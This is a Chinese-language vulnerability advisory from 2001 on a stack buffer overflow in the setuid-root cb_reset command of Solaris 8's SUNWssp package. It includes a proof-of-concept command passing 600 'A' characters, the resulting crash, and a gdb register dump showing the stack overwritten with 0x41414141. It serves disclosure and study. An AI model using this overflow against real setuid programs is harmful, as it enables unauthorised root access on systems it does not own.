Solaris /opt/SUNWssp/bin/cb_reset 存在缓冲溢出发布时间:2001-06-21 更新时间:2001-06-21 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 SunOS 5.8详细描述 SunOS 5.8 中的SUNWssp包中(不是默认安装)包含cb_reset setuid root 命令,其中在处理用户输入的时候没有很好的检查,超过600字符传递就可能造成堆栈破坏,返回地址覆盖。 测试代码 $ uname -a SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10 $ ls /tftpboot/cb_port /tftpboot/cb_port $ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'` Resetting host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... ether_hostton(SrcHost:laika): No such file or directory ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA): No such file or directory Bus Error (core dumped) $ gdb /opt/SUNWssp/bin/cb_reset --core=core Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.8"... (no debugging symbols found)... Core was generated by `/opt/SUNWssp/bin/cb_reset AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 10, Bus Error. Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so... (no debugging symbols found)...done. Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so Reading symbols from /opt/SUNWssp/lib/liblogger.so... (no debugging symbols found)...done. [...] Loaded symbols for /usr/lib/nss_files.so.1 #0 0x1219c in cb_send_frame () (gdb) info registers g0 0x0 0 g1 0xff195b80 -15115392 g2 0xff322630 -13490640 g3 0xff332d78 -13423240 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0x13278 78456 o1 0xff1bbab8 -14959944 o2 0xff1b8018 -14974952 o3 0x13278 78456 o4 0x13258 78424 o5 0xffbedb71 -4269199 sp 0xffbedb18 -4269288 o7 0x1218c 74124 l0 0xc3c3c3c3 -1010580541 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 i4 0x4141414d 1094795597 i5 0x41414141 1094795585 fp 0x41414141 1094795585 i7 0x41414141 1094795585 (***) y 0xb 11 psr 0xfe801001 -25161727 wim 0x0 0 tbr 0x0 0 pc 0x1219c 74140 npc 0x121a0 74144 fpsr 0x0 0 cpsr 0x0 0 (gdb) 解决方案 尚无 相关信息 Pablo Sor psor@afip.gov.ar, psor@ccc.uba.ar |
